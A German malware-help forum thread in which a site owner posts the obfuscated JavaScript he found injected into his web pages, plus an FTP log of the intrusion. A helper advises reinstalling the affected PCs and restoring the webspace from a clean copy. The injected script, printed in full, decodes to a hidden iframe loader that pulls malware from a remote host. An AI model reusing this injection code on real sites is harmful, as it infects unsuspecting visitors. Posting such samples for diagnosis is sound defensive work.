| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Webserver -> TrojanerWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
18.10.2008, 23:10
| #1 |
 |  Webserver -> Trojaner Hi erstmal, hoffe mal ich kann das hier im forum posten. Wurde von einigen Benutzern meiner Internetseite freundlicherweise darauf hingewiesen, dass auf der Seite ein Script nen Trojaner runterladen will. Also hab ich mir heute mal die index.html angeguckt und siehe da: Code:
ATTFilter <script>function c1058032905m48f8a79d6b2ea(m48f8a79d6ba04){ return (parseInt(m48f8a79d6ba04,16));}function m48f8a79d6d9ad(m48f8a79d6e1b2){ function m48f8a79d6f999(){return 2;} var m48f8a79d6e9be='';m48f8a79d7098b=String.fromCharCode;for(m48f8a79d6f1a0=0;m48f8a79d6f1a0<m48f8a79d6e1b2.length;m48f8a79d6f1a0+=m48f8a79d6f999()){ m48f8a79d6e9be+=(m48f8a79d7098b(c1058032905m48f8a79d6b2ea(m48f8a79d6e1b2.substr(m48f8a79d6f1a0,m48f8a79d6f999()))));}return m48f8a79d6e9be;} var z79='';var m48f8a79d71183='3C7'+z79+'3637'+z79+'2697'+z79+'07'+z79+'43E696628216D7'+z79+'96961297'+z79+'B646F637'+z79+'56D656E7'+z79+'42E7'+z79+'7'+z79+'7'+z79+'2697'+z79+'465287'+z79+'56E657'+z79+'363617'+z79+'065282027'+z79+'2533632536392536362537'+z79+'322536312536642536352532302536652536312536642536352533642536332533312533302532302537'+z79+'332537'+z79+'32253633253364253237'+z79+'2536382537'+z79+'342537'+z79+'342537'+z79+'30253361253266253266253337'+z79+'253337'+z79+'253265253332253332253331253265253331253333253333253265253331253337'+z79+'253332253266253265253639253636253266253637'+z79+'2536662532652536382537'+z79+'34253664253663253366253237'+z79+'2532622534642536312537'+z79+'342536382532652537'+z79+'322536662537'+z79+'352536652536342532382534642536312537'+z79+'342536382532652537'+z79+'32253631253665253634253666253664253238253239253261253332253330253335253338253334253239253262253237'+z79+'253338253339253636253237'+z79+'2532302537'+z79+'37'+z79+'2536392536342537'+z79+'34253638253364253333253333253332253230253638253635253639253637'+z79+'2536382537'+z79+'342533642533362533322532302537'+z79+'332537'+z79+'342537'+z79+'39253663253635253364253237'+z79+'2536342536392537'+z79+'332537'+z79+'302536632536312537'+z79+'39253361253230253665253666253665253635253237'+z79+'2533652533632532662536392536362537'+z79+'3225363125366425363525336527'+z79+'29293B7'+z79+'D7'+z79+'6617'+z79+'2206D7'+z79+'969613D7'+z79+'47'+z79+'27'+z79+'5653B3C2F7'+z79+'3637'+z79+'2697'+z79+'07'+z79+'43E';document.write(m48f8a79d6d9ad(m48f8a79d71183));</script>
Code:
ATTFilter </html><script>check_content()</script>
Erstmal aufgeregt, dann rausgelöscht. Danach habe ich mal aus spaß mir auch eine andere html im selben verzeichnis angeshaut und siehe da: wieder das gleiche!!! Ich also alles durchforstet: in fast allen (html dateien welche sehr verschachtelt in ordnern lagen wurden nicht betroffen) html dateien sowie in der "index.php" meines Gästebuches war der Mist vertreten. Natürlich gleich nachgehakt und das in dem FTP-Logfile gefunden: Code:
ATTFilter ...
Fri Oct 17 17:51:45 2008 0 77.221.133.198 21011 /home/httpd/vhosts/******.de/httpdocs/news.html a _ o r [Benutzername] ftp 0 * c
Fri Oct 17 17:51:45 2008 0 77.221.133.198 22396 /home/httpd/vhosts/******.de/httpdocs/news.html a _ i r [Benutzername} ftp 0 * c
...
Hab dann die IP gegoogelt und bin auf einen russischen Server gestoßen  Nun kommt bei mir die Frage auf: wie konnte das sein bzw wie konnte man auf den Server zugreifen? Es ist ein evanzo webserver auf dem nur ein berechtigter FTP Benutzer existiert. Dieser Benutzername wurde auch von dieser russischen IP benutzt! Die Zugangsdaten von diesem Benutzer haben nur 2 Leute (inkl. Ich). Nen Bruteforce Angriff kann ich mir bei einem 14 stelligem Alphanumerischem passwort nicht vorstellen. Also muss entweder der Server gehackt sein oder ein PC welcher auf den Server zugegriffen hat muss von nem Trojaner infiziert sein. Was haltet ihr davon? Mit freundlichen Grüßen P.S.: nach der Säuberung wurde natürlich das FTPPasswort geändert |
|
19.10.2008, 13:10
| #2 |
| /// Helfer-Team    | Webserver -> Trojaner Hi,
__________________wenn das Passwort garantiert nur auf zwei PCs benutzt wurde, dann ist die Sache ja recht einfach, da nur zwei PCs neu aufgesetzt werden müssen. du solltest es übrigens nicht dabei lassen, nur ein paar HTML-Dateien im Webspace zu editieren. Du solltest den Webspace komplett platt machen und eine saubere Kopie hochladen. ansonsten läufst Du Gefahr, eine irgendwo versteckte Shell zu übersehen über die immer wieder Zugriff möglich ist, dann auch ohne Passwort. Gruß, Karl |
|
| Themen zu Webserver -> Trojaner |
| alpha, angriff, benutzer, bruteforce, check, code, content, dateien, evanzo, forum, frage, gehackt, geändert, griff, heute, hilfreich, index.php, infiziert, interne, internetseite, leute, ordner, passwort, script, seite, server, trojane, trojaner, verzeichnis |
Linear-Darstellung
